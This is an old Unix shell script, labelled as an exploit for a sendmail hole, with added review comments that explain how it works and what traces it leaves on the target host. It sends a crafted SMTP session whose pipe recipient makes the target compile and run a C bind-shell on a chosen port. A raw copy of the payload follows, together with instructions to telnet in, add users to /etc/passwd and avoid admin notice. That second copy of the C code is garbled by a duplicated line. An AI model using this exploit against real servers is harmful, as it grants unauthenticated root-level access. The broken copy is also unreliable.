- #!/bin/sh
- # Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com)
- #
- # This material is copyrighted by Scott Chasin, 1992, 1993. The
- # usual standard disclaimer applies, especially the fact that the
- # author is not liable for any damages caused by direct or indirect
- # use of the information or functionality provided by this program.
- #
- # Description:
- #
- # Exploit NEW sendmail hole and bind a port so we can spawn a program.
- # Not for distribution under any circumstances
- #
- # Usage: smail <hostname> <target-user-name> <target-port> <shell command>
- # default: smail <localhost> <daemon> <7001> </bin/sh>
- #
- # Review note: the defaults stated above do not match the code below --
- # the port falls back to 7002 (not 7001) and the command to "/bin/csh -i"
- # (not /bin/sh).  $1 (the host) has no fallback at all; if it is omitted,
- # mconnect at the bottom is run with an empty host argument.
- 
- port=$3
- user=$2
- cmd=$4
- #
- # (The usage header and the three assignments appear twice in this copy
- # of the file; the second copy is identical and has no effect.)
- #
- # Usage: smail <hostname> <target-user-name> <target-port> <shell command>
- # default: smail <localhost> <daemon> <7001> </bin/sh>
- 
- port=$3
- user=$2
- cmd=$4
- 
- # Fallbacks for the optional arguments; note they differ from the usage text.
- if [ -z "$2" ]; then
- user=daemon
- fi
- 
- if [ -z "$3" ]; then
- port=7002
- fi
- 
- if [ -z "$4" ]; then
- cmd="/bin/csh -i"
- fi
- 
- # Everything echoed inside this subshell is one scripted SMTP session that
- # is piped, as a whole, into mconnect (see the end of the subshell).  No
- # server reply is ever read, so the session is fire-and-forget.
- (
- # The sleeps presumably give the server time to emit its banner and
- # replies before the next line arrives.
- sleep 4
- echo "helo"
- # First, throw-away transaction.  Its purpose is not stated in the file;
- # it looks like a set-up step for the second transaction (the header calls
- # the whole thing the "NEW sendmail hole").  From the server's point of
- # view it is a MAIL FROM with a bare "|" sender and a bounce recipient --
- # presumably a recognisable pattern in the mail log.
- echo "mail from: |"
- echo "rcpt to: bounce"
- echo "data"
- echo "."
- sleep 3
- # Second transaction: the recipient is a shell pipeline rather than a
- # mailbox.  This depends on the server handing mail for an address that
- # starts with "|" to that program; sed '1,/^$/d' deletes everything up to
- # the first blank line (the message headers) so only the body reaches sh.
- # Everything echoed between the following "data" and its closing "." is
- # therefore run on the target by sh, as whichever user the server
- # delivers mail as.
- echo "mail from: $user"
- echo "rcpt to: | sed '1,/^$/d' | sh"
- echo "data"
- # The body writes the C source below to /tmp/a.c.  Two here-documents are
- # nested here: "cat << EOF" is this script's own, used to send the source
- # verbatim; the echoed "cat > /tmp/a.c <<EOF" / "EOF" pair is the one the
- # target's sh executes.  What the source builds: a program that binds a
- # TCP socket on the port named by its first argument (a service name or a
- # number), accept()s, and for each connection fork()s a child whose
- # stdin/stdout/stderr are dup2()'d onto the socket before execv() of the
- # remaining arguments.  Nothing on that socket authenticates the peer.
- echo "cat > /tmp/a.c <<EOF"
- cat << EOF
- #include <sys/types.h>
- #include <sys/signal.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netdb.h>
- reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
- int **av;{struct sockaddr_in mya;struct servent *sp
- ;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
- signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
- 0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
- sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
- ==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
- =htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
- (struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
- 1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
- (select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
- loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
- ==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
- NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
- (0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
- goto loop;}
- EOF
- echo "EOF"
- # Build, delete the source, start the listener.  Host artefacts a
- # responder can look for: /tmp/a.out (the .c is removed but the binary is
- # left behind), a listening TCP socket on $port owned by the mail
- # delivery user, a compiler run descending from the mail server's process
- # tree, and the "|" recipient in the SMTP log.  $port and $cmd are
- # expanded here, on the sending side, and the target's sh word-splits
- # them; the C program passes everything after the port to execv().
- echo "cd /tmp"
- echo "/bin/cc /tmp/a.c"
- echo "/bin/rm a.c"
- echo "/tmp/a.out $port $cmd"
- echo "."
- echo "quit"
- # mconnect: the SMTP test client that shipped with SunOS of that era.
- # $1 is unquoted and has no default (see the note at the top).
- ) | mconnect $1
-
- Or you can also ul this to port 25.
- BTW, it gets you in by running a program that listens to port 7008...
- you telnet to port 7008. You can then proceed to create new users in
- /etc/passwd because you own the /etc dir...you need to type a ; after every
- command, and it gives you 1 error every command...ignore it. The process
- may be noticed by a few admins.
-
- helo
- mail from: |
- rcpt to: bounce
- data
- .
- mail from: bin
- rcpt to: | sed '1,/^$/d' | sh
- data
- cat > /tmp/a.c <<EOF
- #include <sys/types.h>
- #include <sys/signal.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <netdb.h>
- reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
- int **av;{struct sockaddr_in mya;struct servent *sp
- ;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
- signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
- 0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
- sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
- ==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
- =htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
- (struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
- 1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
- (select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
- loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
- ,0))<0)goto loop;if(fork()
- ==0){for(x=2;x<maxfd;x++)if(x!=new)close(x);for(x=0;x<
- NSIG;x++)signal(x,SIG_DFL);dup2(new,0);close(new);dup2
- (0,1);dup2(0,2);execv(av[2],av+2);exit(1);}close(new);
- goto loop;}
- EOF
- cd /tmp
- /bin/cc /tmp/a.c
- /bin/rm a.c
- /tmp/a.out 7008 /bin/sh
- .
- quit